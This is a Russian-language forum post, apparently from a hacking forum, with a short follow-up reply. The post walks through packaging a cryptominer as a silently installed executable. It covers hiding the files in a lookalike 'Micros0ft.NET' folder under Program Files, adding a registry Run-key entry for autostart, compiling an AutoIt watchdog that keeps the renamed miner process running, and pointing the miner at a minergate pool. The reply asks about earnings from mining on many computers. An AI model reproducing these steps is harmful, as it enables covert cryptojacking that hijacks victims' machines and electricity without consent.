Всем привет, в общем, задача стояла создать ехе с майнером, который бы запускал его в фоне, автозагрузка и чек на то, запущен ли процесс, я нихера не программист и быдлокодить на делфях и т.д не получается, хотя, я и не пробовал ниразу, решил пойти более легким путем, ну и вот что получилось. Программы которые были использованы: Smart Install Maker AutoIt v3 Для начала нужно определится с пулом для майнинга, я использовал minergate. Качаем архив Пароль на архив: xnteam Разберем файлы autorun.bat - добавляет check.exe в автозагрузку check.au3 - файл для дальнейшей компиляции check.exe start.bat - запуск майнера с необходимыми параметрами xakername.exe - сам майнер Меняем имя файла xakername.exe на свое Открываем autorun.bat Код: Set pathBat=%ProgramFiles%Micros0ft.NETcheck.exe reg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun /v "check" /t REG_SZ /d "%pathBat%" /f Меняем путь на свой, название файла check так же можно заменить Код: %ProgramFiles%Micros0ft.NETcheck.exe Так же, в файле check.au3 нужно изменить имя будущего процесса $sProcName = "xakername.exe" Ну и наконец start.bat главное определится с тем, что вы будите майнить, список всех возможных вариантов можно посмотреть тут https://ru.minergate.com/altminers/ccminer (не советую майнить ничего кроме байткоин и монеро) меняем stratum+tcp://bcn.pool.minergate.com:45550 на нужный меняем -u mail@mail.ru на ваш, с которым регестрировались на minergate. Сохраняем. Компилим check.au3 Далее, открыть и создать новый проект в Smart Install Maker "Файлы" - Добавить Далее вкладка "Требования" Убираем все, кроме висты, 2008 и вин 7 Вкладка - "Диалоги" - Скрытая установка там же - "Каталог установки" прописать путь, как и в autorun.bat %ProgramFiles%Micros0ft.NET Далее - Команды Ну и "Компилировать" Получим готовый ехе, с автозапуском и чеком, запущен ли процесс. На счет правильности команд и грамотности создания верных ключей реестра я не особо уверен, моя задача была лишь сделать ехе с автораном. З.Ы. огромное спасибо Mr.Burns за помощь с работой в реестре, хоть я и не использовал его код, но помогла чать кодов которые он давал При копировании сей "статьи", если ее так можно назвать, ссылка на первоисточник обязательна
Интересовался темой майнинга но отговорили, сказали сейчас майнить на обычных компах невыгодно, даже на халявной электроэнергии и железе. Что за майнер, майнит процессором или видеокартой? Есть ли смысл майнить в пуле на слабых-средих компах но компов достаточно много? Как расчитать доход? Хулиган, буду рад любой информации... Заработал хоть, что то?